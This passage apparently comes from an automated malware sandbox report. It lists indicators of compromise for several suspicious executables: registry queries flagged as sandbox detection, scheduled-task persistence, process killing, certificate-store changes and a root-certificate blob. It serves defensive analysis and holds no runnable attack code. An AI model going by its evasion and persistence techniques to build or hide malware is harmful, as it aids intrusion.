C:\Windows\Installer\MSIE70E.tmp msiexec.exe File created C:\Windows\Installer\SourceHash{C845414C-903C-4218-9DE7-132AB97FDF62} msiexec.exe File opened for modification C:\Windows\Installer\MSIF50D.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSID5.tmp msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 29 IoCs
pid pid_target Process procid_target 5936 5352 WerFault.exe 129 6960 5132 WerFault.exe 126 6504 4428 WerFault.exe 128 6512 4556 WerFault.exe 112 2392 2220 WerFault.exe 115 6040 3088 WerFault.exe 148 1248 4944 WerFault.exe 221 7640 2640 WerFault.exe 161 7968 5620 WerFault.exe 152 6768 2240 WerFault.exe 164 8444 6424 WerFault.exe 329 8508 7076 WerFault.exe 267 8544 7076 WerFault.exe 267 9072 5388 WerFault.exe 286 9000 7056 WerFault.exe 207 3304 2160 WerFault.exe 257 8888 7688 WerFault.exe 290 2696 6252 WerFault.exe 296 8604 7680 WerFault.exe 291 4836 7580 WerFault.exe 303 5980 8588 WerFault.exe 378 19372 4728 WerFault.exe 380 6256 9048 WerFault.exe 398 10372 2356 WerFault.exe 414 10848 552 WerFault.exe 420 10964 5156 WerFault.exe 421 11536 5584 WerFault.exe 438 11856 8624 WerFault.exe 452 12956 9944 WerFault.exe 468 -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI nvqVMx4So_nVmBVhfMm_C75A.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI nvqVMx4So_nVmBVhfMm_C75A.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI nvqVMx4So_nVmBVhfMm_C75A.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 177C.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 177C.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 177C.exe -
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Setup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe -
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 6528 schtasks.exe 4700 schtasks.exe 7028 schtasks.exe 5116 schtasks.exe -
Enumerates system info in registry 2 TTPs 59 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe -
Kills process with taskkill 3 IoCs
pid Process 6056 taskkill.exe 8032 taskkill.exe 14084 taskkill.exe -
description ioc Process Key created \Registry\User\S-1-5-21-257790753-2419383948-818201544-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2 cmd.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\8 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs WaaSMedicAgent.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\7 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs svchost.exe -
Modifies registry class 9 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Explorer.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Explorer.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\Instance\ Explorer.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Explorer.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{f8278c54-a712-415b-b593-b77a2be0dda9}\Instance\ Explorer.EXE Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-257790753-2419383948-818201544-1000\{7709300F-E728-4716-B21B-49409FC30AB1} Calculator.exe Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\Local Settings gchrdfmab.exe Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\Local Settings Tue091e2054cef7.exe Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\Local Settings MSBuild.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000007431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 5c000000010000000400000000080000190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc36200000001000000200000007431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8040000000100000010000000d474de575c39b2d39c8583c5c065498a2000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1